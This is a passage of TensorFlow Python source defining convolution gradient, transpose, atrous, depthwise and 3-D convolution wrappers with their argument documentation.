return gen_nn_ops.conv2d_backprop_filter(
input, filter_sizes, out_backprop, strides, padding, use_cudnn_on_gpu,
explicit_paddings, data_format, dilations, name)
@tf_export(v1=["nn.conv2d_backprop_input"])
@dispatch.add_dispatch_support
def conv2d_backprop_input( # pylint: disable=redefined-builtin,dangerous-default-value
input_sizes,
filter=None,
out_backprop=None,
strides=None,
padding=None,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None,
filters=None):
r"""Computes the gradients of convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`.
An integer vector representing the shape of `input`,
where `input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
4-D with shape
`[filter_height, filter_width, in_channels, out_channels]`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution. Must be in the same order as the dimension specified
with format.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by
the value of `data_format`, see above for details. Dilations in the batch
and depth dimensions must be 1.
name: A name for the operation (optional).
filters: Alias for filter.
Returns:
A `Tensor`. Has the same type as `filter`.
"""
filter = deprecation.deprecated_argument_lookup(
"filters", filters, "filter", filter)
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.conv2d_backprop_input(
input_sizes, filter, out_backprop, strides, padding, use_cudnn_on_gpu,
explicit_paddings, data_format, dilations, name)
@tf_export(v1=["nn.conv2d_transpose"])
@dispatch.add_dispatch_support
def conv2d_transpose(
value=None,
filter=None, # pylint: disable=redefined-builtin
output_shape=None,
strides=None,
padding="SAME",
data_format="NHWC",
name=None,
input=None, # pylint: disable=redefined-builtin
filters=None,
dilations=None):
"""The transpose of `conv2d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of `conv2d`
rather than an actual deconvolution.
Args:
value: A 4-D `Tensor` of type `float` and shape
`[batch, height, width, in_channels]` for `NHWC` data format or
`[batch, in_channels, height, width]` for `NCHW` data format.
filter: A 4-D `Tensor` with the same type as `value` and shape
`[height, width, output_channels, in_channels]`. `filter`'s
`in_channels` dimension must match that of `value`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
the `N` and `C` dimensions are set to 0. The dimension order is determined
by the value of `data_format`, see below for details.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NHWC' and 'NCHW' are supported.
name: Optional name for the returned tensor.
input: Alias for value.
filters: Alias for filter.
dilations: An int or list of `ints` that has length `1`, `2` or `4`,
defaults to 1. The dilation factor for each dimension of`input`. If a
single value is given it is replicated in the `H` and `W` dimension. By
default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details. Dilations in the batch and depth dimensions if a 4-d tensor
must be 1.
Returns:
A `Tensor` with the same type as `value`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
value = deprecated_argument_lookup("input", input, "value", value)
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
with ops.name_scope(name, "conv2d_transpose",
[value, filter, output_shape]) as name:
return conv2d_transpose_v2(
value,
filter,
output_shape,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export("nn.conv2d_transpose", v1=[])
@dispatch.add_dispatch_support
def conv2d_transpose_v2(
input, # pylint: disable=redefined-builtin
filters, # pylint: disable=redefined-builtin
output_shape,
strides,
padding="SAME",
data_format="NHWC",
dilations=None,
name=None):
"""The transpose of `conv2d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of
`atrous_conv2d` rather than an actual deconvolution.
Args:
input: A 4-D `Tensor` of type `float` and shape `[batch, height, width,
in_channels]` for `NHWC` data format or `[batch, in_channels, height,
width]` for `NCHW` data format.
filters: A 4-D `Tensor` with the same type as `input` and shape `[height,
width, output_channels, in_channels]`. `filter`'s `in_channels` dimension
must match that of `input`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
the `N` and `C` dimensions are set to 0. The dimension order is determined
by the value of `data_format`, see below for details.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: A string. 'NHWC' and 'NCHW' are supported.
dilations: An int or list of `ints` that has length `1`, `2` or `4`,
defaults to 1. The dilation factor for each dimension of`input`. If a
single value is given it is replicated in the `H` and `W` dimension. By
default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details. Dilations in the batch and depth dimensions if a 4-d tensor
must be 1.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `input`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv2d_transpose",
[input, filter, output_shape]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
strides = _get_sequence(strides, 2, channel_index, "strides")
dilations = _get_sequence(dilations, 2, channel_index, "dilations")
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.conv2d_backprop_input(
input_sizes=output_shape,
filter=filters,
out_backprop=input,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
def _conv2d_expanded_batch(
input, # pylint: disable=redefined-builtin
filters,
strides,
padding,
data_format,
dilations,
name):
"""Helper function for `convolution_internal`; handles expanded batches."""
# Try really hard to avoid modifying the legacy name scopes - return early.
input_rank = input.shape.rank
if input_rank is None or input_rank < 5:
# We avoid calling squeeze_batch_dims to reduce extra python function
# call slowdown in eager mode. This branch doesn't require reshapes.
return gen_nn_ops.conv2d(
input,
filter=filters,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
return squeeze_batch_dims(
input,
functools.partial(
gen_nn_ops.conv2d,
filter=filters,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations),
inner_rank=3,
name=name)
@tf_export("nn.atrous_conv2d_transpose")
@dispatch.add_dispatch_support
def atrous_conv2d_transpose(value,
filters,
output_shape,
rate,
padding,
name=None):
"""The transpose of `atrous_conv2d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of
`atrous_conv2d` rather than an actual deconvolution.
Args:
value: A 4-D `Tensor` of type `float`. It needs to be in the default `NHWC`
format. Its shape is `[batch, in_height, in_width, in_channels]`.
filters: A 4-D `Tensor` with the same type as `value` and shape
`[filter_height, filter_width, out_channels, in_channels]`. `filters`'
`in_channels` dimension must match that of `value`. Atrous convolution is
equivalent to standard convolution with upsampled filters with effective
height `filter_height + (filter_height - 1) * (rate - 1)` and effective
width `filter_width + (filter_width - 1) * (rate - 1)`, produced by
inserting `rate - 1` zeros along consecutive elements across the
`filters`' spatial dimensions.
output_shape: A 1-D `Tensor` of shape representing the output shape of the
deconvolution op.
rate: A positive int32. The stride with which we sample input values across
the `height` and `width` dimensions. Equivalently, the rate by which we
upsample the filter values by inserting zeros across the `height` and
`width` dimensions. In the literature, the same parameter is sometimes
called `input stride` or `dilation`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `value`.
Raises:
ValueError: If input/output depth does not match `filters`' shape, or if
padding is other than `'VALID'` or `'SAME'`, or if the `rate` is less
than one, or if the output_shape is not a tensor with 4 elements.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "atrous_conv2d_transpose",
[value, filters, output_shape]) as name:
value = ops.convert_to_tensor(value, name="value")
filters = ops.convert_to_tensor(filters, name="filters")
if not value.get_shape().dims[3].is_compatible_with(filters.get_shape()[3]):
raise ValueError(
"value's input channels does not match filters' input channels, "
"{} != {}".format(value.get_shape()[3],
filters.get_shape()[3]))
if rate < 1:
raise ValueError("rate {} cannot be less than one".format(rate))
if rate == 1:
return conv2d_transpose(
value,
filters,
output_shape,
strides=[1, 1, 1, 1],
padding=padding,
data_format="NHWC")
output_shape_ = ops.convert_to_tensor(output_shape, name="output_shape")
if not output_shape_.get_shape().is_compatible_with(
tensor_shape.TensorShape([4])):
raise ValueError("output_shape must have shape (4,), got {}".format(
output_shape_.get_shape()))
if isinstance(output_shape, tuple):
output_shape = list(output_shape)
if isinstance(output_shape, (list, np.ndarray)):
# output_shape's shape should be == [4] if reached this point.
if not filters.get_shape().dims[2].is_compatible_with(output_shape[3]):
raise ValueError(
"output_shape does not match filter's output channels, "
"{} != {}".format(output_shape[3],
filters.get_shape()[2]))
# We have two padding contributions. The first is used for converting "SAME"
# to "VALID". The second is required so that the height and width of the
# zero-padded value tensor are multiples of rate.
# Padding required to reduce to "VALID" convolution
if padding == "SAME":
# Handle filters whose shape is unknown during graph creation.
if filters.get_shape().is_fully_defined():
filter_shape = filters.get_shape().as_list()
else:
filter_shape = array_ops.shape(filters)
filter_height, filter_width = filter_shape[0], filter_shape[1]
# Spatial dimensions of the filters and the upsampled filters in which we
# introduce (rate - 1) zeros between consecutive filter values.
filter_height_up = filter_height + (filter_height - 1) * (rate - 1)
filter_width_up = filter_width + (filter_width - 1) * (rate - 1)
pad_height = filter_height_up - 1
pad_width = filter_width_up - 1
# When pad_height (pad_width) is odd, we pad more to bottom (right),
# following the same convention as conv2d().
pad_top = pad_height // 2
pad_bottom = pad_height - pad_top
pad_left = pad_width // 2
pad_right = pad_width - pad_left
elif padding == "VALID":
pad_top = 0
pad_bottom = 0
pad_left = 0
pad_right = 0
else:
raise ValueError("padding must be either VALID or SAME:"
" {}".format(padding))
in_height = output_shape[1] + pad_top + pad_bottom
in_width = output_shape[2] + pad_left + pad_right
# More padding so that rate divides the height and width of the input.
pad_bottom_extra = (rate - in_height % rate) % rate
pad_right_extra = (rate - in_width % rate) % rate
# The paddings argument to space_to_batch is just the extra padding
# component.
space_to_batch_pad = [[0, pad_bottom_extra], [0, pad_right_extra]]
value = array_ops.space_to_batch(
input=value, paddings=space_to_batch_pad, block_size=rate)
input_sizes = [
rate * rate * output_shape[0], (in_height + pad_bottom_extra) // rate,
(in_width + pad_right_extra) // rate, output_shape[3]
]
value = gen_nn_ops.conv2d_backprop_input(
input_sizes=input_sizes,
filter=filters,
out_backprop=value,
strides=[1, 1, 1, 1],
padding="VALID",
data_format="NHWC")
# The crops argument to batch_to_space includes both padding components.
batch_to_space_crop = [[pad_top, pad_bottom + pad_bottom_extra],
[pad_left, pad_right + pad_right_extra]]
return array_ops.batch_to_space(
input=value, crops=batch_to_space_crop, block_size=rate)
@tf_export(v1=["nn.depthwise_conv2d_native"])
@dispatch.add_dispatch_support
@deprecation.deprecated_endpoints("nn.depthwise_conv2d_native")
def depthwise_conv2d_native( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter,
strides,
padding,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes a 2-D depthwise convolution.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, channel_multiplier]`, containing
`in_channels` convolutional filters of depth 1, `depthwise_conv2d` applies
a different filter to each input channel (expanding from 1 channel to
`channel_multiplier` channels for each), then concatenates the results
together. Thus, the output has `in_channels * channel_multiplier` channels.
```
for k in 0..in_channels-1
for q in 0..channel_multiplier-1
output[b, i, j, k * channel_multiplier + q] =
sum_{di, dj} input[b, strides[1] * i + di, strides[2] * j + dj, k] *
filter[di, dj, k, q]
```
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertices strides, `strides = [1, stride, stride, 1]`.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`,
`float32`, `float64`.
filter: A `Tensor`. Must have the same type as `input`.
strides: A list of `ints`. 1-D of length 4. The stride of the sliding
window for each dimension of `input`.
padding: Controls how to pad the image before applying the convolution. Can
be the string `"SAME"` or `"VALID"` indicating the type of padding
algorithm to use, or a list indicating the explicit paddings at the start
and end of each dimension. When explicit padding is used and data_format
is `"NHWC"`, this should be in the form `[[0, 0], [pad_top, pad_bottom],
[pad_left, pad_right], [0, 0]]`. When explicit padding used and
data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to
`"NHWC"`. Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of: [batch, height,
width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`. 1-D
tensor of length 4. The dilation factor for each dimension of `input`. If
set to k > 1, there will be k-1 skipped cells between each filter element
on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.depthwise_conv2d_native(
input,
filter,
strides,
padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export(
"nn.depthwise_conv2d_backprop_input",
v1=[
"nn.depthwise_conv2d_native_backprop_input",
"nn.depthwise_conv2d_backprop_input"
])
@dispatch.add_dispatch_support
@deprecation.deprecated_endpoints("nn.depthwise_conv2d_native_backprop_input")
def depthwise_conv2d_native_backprop_input( # pylint: disable=redefined-builtin,dangerous-default-value
input_sizes,
filter,
out_backprop,
strides,
padding,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes the gradients of depthwise convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`. An integer vector representing the
shape of `input`, based on `data_format`. For example, if `data_format`
is 'NHWC' then `input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`,
`float32`, `float64`. 4-D with shape `[filter_height, filter_width,
in_channels, depthwise_multiplier]`.
out_backprop: A `Tensor`. Must have the same type as `filter`. 4-D with
shape based on `data_format`. For example, if `data_format` is 'NHWC'
then out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`. The stride of the sliding window for each
dimension of the input of the convolution.
padding: Controls how to pad the image before applying the convolution. Can
be the string `"SAME"` or `"VALID"` indicating the type of padding
algorithm to use, or a list indicating the explicit paddings at the start
and end of each dimension. When explicit padding is used and data_format
is `"NHWC"`, this should be in the form `[[0, 0], [pad_top, pad_bottom],
[pad_left, pad_right], [0, 0]]`. When explicit padding used and
data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to
`"NHWC"`. Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of: [batch, height,
width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`. 1-D
tensor of length 4. The dilation factor for each dimension of `input`. If
set to k > 1, there will be k-1 skipped cells between each filter element
on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.depthwise_conv2d_native_backprop_input(
input_sizes,
filter,
out_backprop,
strides,
padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export(
"nn.depthwise_conv2d_backprop_filter",
v1=[
"nn.depthwise_conv2d_native_backprop_filter",
"nn.depthwise_conv2d_backprop_filter"
])
@dispatch.add_dispatch_support
@deprecation.deprecated_endpoints("nn.depthwise_conv2d_native_backprop_filter")
def depthwise_conv2d_native_backprop_filter( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter_sizes,
out_backprop,
strides,
padding,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes the gradients of depthwise convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`,
`float32`, `float64`. 4-D with shape based on `data_format`. For example,
if `data_format` is 'NHWC' then `input` is a 4-D `[batch, in_height,
in_width, in_channels]` tensor.
filter_sizes: A `Tensor` of type `int32`. An integer vector representing the
tensor shape of `filter`, where `filter` is a 4-D `[filter_height,
filter_width, in_channels, depthwise_multiplier]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`. 4-D with shape
based on `data_format`. For example, if `data_format` is 'NHWC' then
out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`. The stride of the sliding window for each
dimension of the input of the convolution.
padding: Controls how to pad the image before applying the convolution. Can
be the string `"SAME"` or `"VALID"` indicating the type of padding
algorithm to use, or a list indicating the explicit paddings at the start
and end of each dimension. When explicit padding is used and data_format
is `"NHWC"`, this should be in the form `[[0, 0], [pad_top, pad_bottom],
[pad_left, pad_right], [0, 0]]`. When explicit padding used and
data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to
`"NHWC"`. Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of: [batch, height,
width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`. 1-D
tensor of length 4. The dilation factor for each dimension of `input`. If
set to k > 1, there will be k-1 skipped cells between each filter element
on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.depthwise_conv2d_native_backprop_filter(
input,
filter_sizes,
out_backprop,
strides,
padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
def _conv3d_expanded_batch(
input, # pylint: disable=redefined-builtin
filter, # pylint: disable=redefined-builtin
strides,
padding,
data_format,
dilations=None,
name=None):
"""Helper function for `conv3d`; handles expanded batches."""
shape = input.shape
# shape object may lack ndims, e.g., if input is an np.ndarray. In that case,
# we fall back to len(shape).
ndims = getattr(shape, "ndims", -1)
if ndims == -1:
ndims = len(shape)
if ndims in (5, 4, 3, 2, 1, 0, None):
# We avoid calling squeeze_batch_dims to reduce extra python function
# call slowdown in eager mode. This branch doesn't require reshapes.
return gen_nn_ops.conv3d(
input,
filter,
strides,
padding,
data_format=data_format,
dilations=dilations,
name=name)
else:
return squeeze_batch_dims(
input,
functools.partial(
gen_nn_ops.conv3d,
filter=filter,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations),
inner_rank=4,
name=name)
@tf_export("nn.conv3d", v1=[])
@dispatch.add_dispatch_support
def conv3d_v2(input, # pylint: disable=redefined-builtin,missing-docstring
filters,
strides,
padding,
data_format="NDHWC",
dilations=None,
name=None):
if dilations is None:
dilations = [1, 1, 1, 1, 1]
return _conv3d_expanded_batch(input, filters, strides, padding, data_format,
dilations, name)
@tf_export(v1=["nn.conv3d"])
@dispatch.add_dispatch_support
def conv3d_v1( # pylint: disable=missing-docstring,dangerous-default-value
input, # pylint: disable=redefined-builtin
filter=None, # pylint: disable=redefined-builtin
strides=None,
padding=None,
data_format="NDHWC",
dilations=[1, 1, 1, 1, 1],
name=None,
filters=None):
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
return gen_nn_ops.conv3d(
input, filter, strides, padding, data_format, dilations, name)
conv3d_v2.__doc__ = deprecation.rewrite_argument_docstring(
gen_nn_ops.conv3d.__doc__, "filter", "filters")
conv3d_v1.__doc__ = gen_nn_ops.conv3d.__doc__
@tf_export(v1=["nn.conv3d_transpose"])
@dispatch.add_dispatch_support
def conv3d_transpose(
value,
filter=None, # pylint: disable=redefined-builtin
output_shape=None,
strides=None,
padding="SAME",
data_format="NDHWC",
name=None,
input=None, # pylint: disable=redefined-builtin
filters=None,
dilations=None):
"""The transpose of `conv3d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of `conv3d`
rather than an actual deconvolution.
Args:
value: A 5-D `Tensor` of type `float` and shape
`[batch, depth, height, width, in_channels]`.
filter: A 5-D `Tensor` with the same type as `value` and shape
`[depth, height, width, output_channels, in_channels]`. `filter`'s
`in_channels` dimension must match that of `value`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: A list of ints. The stride of the sliding window for each
dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string, either `'NDHWC'` or `'NCDHW`' specifying the layout
of the input and output tensors. Defaults to `'NDHWC'`.
name: Optional name for the returned tensor.
input: Alias of value.
filters: Alias of filter.
dilations: An int or list of `ints` that has length `1`, `3` or `5`,
defaults to 1. The dilation factor for each dimension of`input`. If a
single value is given it is replicated in the `D`, `H` and `W` dimension.
By default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details. Dilations in the batch and depth dimensions if a 5-d tensor
must be 1.
Returns:
A `Tensor` with the same type as `value`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
value = deprecated_argument_lookup("input", input, "value", value)
return conv3d_transpose_v2(
value,
filter,
output_shape,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export("nn.conv3d_transpose", v1=[])
@dispatch.add_dispatch_support
def conv3d_transpose_v2(input, # pylint: disable=redefined-builtin
filters,
output_shape,
strides,
padding="SAME",
data_format="NDHWC",
dilations=None,
name=None):
"""The transpose of `conv3d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of `conv3d`
rather than an actual deconvolution.
Args:
input: A 5-D `Tensor` of type `float` and shape `[batch, depth, height,
width, in_channels]` for `NDHWC` data format or `[batch, in_channels,
depth, height, width]` for `NCDHW` data format.
filters: A 5-D `Tensor` with the same type as `input` and shape `[depth,
height, width, output_channels, in_channels]`. `filter`'s `in_channels`
dimension must match that of `input`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `3` or `5`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `D`, `H` and `W` dimension. By
default the `N` and `C` dimensions are set to 0. The dimension order is
determined by the value of `data_format`, see below for details.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NDHWC' and 'NCDHW' are supported.
dilations: An int or list of `ints` that has length `1`, `3` or `5`,
defaults to 1. The dilation factor for each dimension of`input`. If a
single value is given it is replicated in the `D`, `H` and `W` dimension.
By default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details. Dilations in the batch and depth dimensions if a 5-d tensor
must be 1.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `input`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv3d_transpose",
[input, filter, output_shape]) as name:
if data_format is None:
data_format = "NDHWC"
channel_index = 1 if data_format.startswith("NC") else 4
strides = _get_sequence(strides, 3, channel_index, "strides")
dilations = _get_sequence(dilations, 3, channel_index, "dilations")
return gen_nn_ops.conv3d_backprop_input_v2(
input_sizes=output_shape,
filter=filters,
out_backprop=input,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
CONV_TRANSPOSE_OPS = (
conv1d_transpose,
conv2d_transpose_v2,
conv3d_transpose_v2,
)
@tf_export("nn.conv_transpose")
@dispatch.add_dispatch_support
def conv_transpose(input, # pylint: disable=redefined-builtin
filters,
output_shape,
strides,
padding="SAME",
data_format=None,
dilations=None,
name=None):
"""The transpose of `convolution`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is really the transpose (gradient) of `conv3d`
rather than an actual deconvolution.
Args:
input: An N+2 dimensional `Tensor` of shape
`[batch_size] + input_spatial_shape + [in_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, in_channels] + input_spatial_shape` if data_format starts
with "NC". It must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
filters: An N+2 dimensional `Tensor` with the same type as `input` and
shape `spatial_filter_shape + [in_channels, out_channels]`.
output_shape: A 1-D `Tensor` representing the output shape of the
deconvolution op.
strides: An int or list of `ints` that has length `1`, `N` or `N+2`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the spatial dimensions. By default
the `N` and `C` dimensions are set to 0. The dimension order is determined
by the value of `data_format`, see below for details.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
dilations: An int or list of `ints` that has length `1`, `N` or `N+2`,
defaults to 1. The dilation factor for each dimension of`input`. If a
single value is given it is replicated in the spatial dimensions. By
default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details.
name: A name for the operation (optional). If not specified "conv_transpose"
is used.
Returns:
A `Tensor` with the same type as `value`.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv_transpose",
[input, filter, output_shape]) as name:
if tensor_util.is_tf_type(output_shape):
n = output_shape.shape[0] - 2
elif isinstance(output_shape, collections_abc.Sized):
n = len(output_shape) - 2
else:
raise ValueError("output_shape must be a tensor or sized collection.")
if not 1 <= n <= 3:
raise ValueError(
"output_shape must be of length 3, 4 or 5 but was {}.".format(n + 2))
op = CONV_TRANSPOSE_OPS[n-1]
return op(
input,
filters,
output_shape,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
def _tf_deterministic_ops():
if _tf_deterministic_ops.value is None:
tf_deterministic_ops = os.environ.get("TF_DETERMINISTIC_OPS")
if tf_deterministic_ops is not None:
tf_deterministic_ops = tf_deterministic_ops.lower()
_tf_deterministic_ops.value = (
tf_deterministic_ops == "true" or tf_deterministic_ops == "1")
return _tf_deterministic_ops.value
_tf_deterministic_ops.value = None
